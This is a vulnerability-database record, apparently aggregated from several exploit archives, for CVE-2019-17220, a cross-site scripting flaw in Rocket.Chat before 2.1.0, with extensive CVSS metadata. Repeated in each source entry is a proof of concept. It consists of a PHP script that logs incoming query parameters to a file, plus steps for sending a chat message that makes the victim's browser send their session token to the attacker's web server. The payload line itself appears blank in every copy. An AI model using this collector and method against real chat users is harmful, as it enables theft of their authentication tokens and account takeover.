ID EDB-ID:47537Type exploitdbReporter 3H34NModified 2019-10-23T00:00:00
Description
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)
# PoC
# 1. Create l33t.php on a web server
<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>
# 2. Open a chat session
# 3. Send payload with your web server url
# 4. Token will be written in logs.txt when target seen your message.
{"id": "EDB-ID:47537", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting", "description": "", "published": "2019-10-23T00:00:00", "modified": "2019-10-23T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.exploit-db.com/exploits/47537", "reporter": "3H34N", "references": [], "cvelist": ["CVE-2019-17220", "2019-17220"], "immutableFields": [], "lastseen": "2022-01-13T05:32:01", "viewCount": 176, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-17220"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1D776637493F3A160A307862D89B339B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154944"]}, {"type": "zdt", "idList": ["1337DAY-ID-33405"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2019-17220"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1D776637493F3A160A307862D89B339B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154944"]}, {"type": "zdt", "idList": ["1337DAY-ID-33405"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceHref": "https://www.exploit-db.com/download/47537", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\r\n# Author: 3H34N\r\n# Date: 2019-10-22\r\n# Product: Rocket.Chat\r\n# Vendor: https://rocket.chat/\r\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\r\n# CVE: CVE-2019-17220\r\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\r\n\r\n# PoC\r\n# 1. Create l33t.php on a web server\r\n\r\n<?php\r\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\r\n$leet = $_GET['leet'].\"\\n\\n\";\r\nfwrite($output, $leet);\r\nfclose($output);\r\n?>\r\n\r\n# 2. Open a chat session\r\n# 3. Send payload with your web server url\r\n\r\n\r\n\r\n# 4. Token will be written in logs.txt when target seen your message.", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1645536178}}
{"zdt": [{"lastseen": "2019-12-04T02:03:11", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2019-10-23T00:00:00", "type": "zdt", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "1337DAY-ID-33405", "href": "https://0day.today/exploit/description/33405", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\r\n# Author: 3H34N\r\n# Product: Rocket.Chat\r\n# Vendor: https://rocket.chat/\r\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\r\n# CVE: CVE-2019-17220\r\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\r\n\r\n# PoC\r\n# 1. Create l33t.php on a web server\r\n\r\n<?php\r\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\r\n$leet = $_GET['leet'].\"\\n\\n\";\r\nfwrite($output, $leet);\r\nfclose($output);\r\n?>\r\n\r\n# 2. Open a chat session\r\n# 3. Send payload with your web server url\r\n\r\n\r\n\r\n# 4. Token will be written in logs.txt when target seen your message.\n\n# 0day.today [2019-12-03] #", "sourceHref": "https://0day.today/exploit/33405", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-10-24T23:13:32", "description": "", "published": "2019-10-23T00:00:00", "type": "packetstorm", "title": "Rocket.Chat 2.1.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "PACKETSTORM:154944", "href": "https://packetstormsecurity.com/files/154944/Rocket.Chat-2.1.0-Cross-Site-Scripting.html", "sourceData": "`# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting \n# Author: 3H34N \n# Date: 2019-10-22 \n# Product: Rocket.Chat \n# Vendor: https://rocket.chat/ \n# Vulnerable Version(s): Rocket.Chat < 2.1.0 \n# CVE: CVE-2019-17220 \n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) \n \n# PoC \n# 1. Create l33t.php on a web server \n \n<?php \n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\"); \n$leet = $_GET['leet'].\"\\n\\n\"; \nfwrite($output, $leet); \nfclose($output); \n?> \n \n# 2. Open a chat session \n# 3. Send payload with your web server url \n \n \n \n# 4. Token will be written in logs.txt when target seen your message. \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154944/rocketchat210-xss.txt"}], "cve": [{"lastseen": "2022-03-23T21:27:48", "description": "Rocket.Chat before 2.1.0 allows XSS via a URL on a ![title] line.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-10-21T21:15:00", "type": "cve", "title": "CVE-2019-17220", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T20:15:00", "cpe": [], "id": "CVE-2019-17220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17220", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "exploitpack": [{"lastseen": "2020-04-01T20:40:37", "description": "\nRocket.Chat 2.1.0 - Cross-Site Scripting", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-10-23T00:00:00", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "EXPLOITPACK:1D776637493F3A160A307862D89B339B", "href": "", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\n# Author: 3H34N\n# Date: 2019-10-22\n# Product: Rocket.Chat\n# Vendor: https://rocket.chat/\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\n# CVE: CVE-2019-17220\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\n\n# PoC\n# 1. Create l33t.php on a web server\n\n<?php\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\n$leet = $_GET['leet'].\"\\n\\n\";\nfwrite($output, $leet);\nfclose($output);\n?>\n\n# 2. Open a chat session\n# 3. Send payload with your web server url\n\n\n\n# 4. Token will be written in logs.txt when target seen your message.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
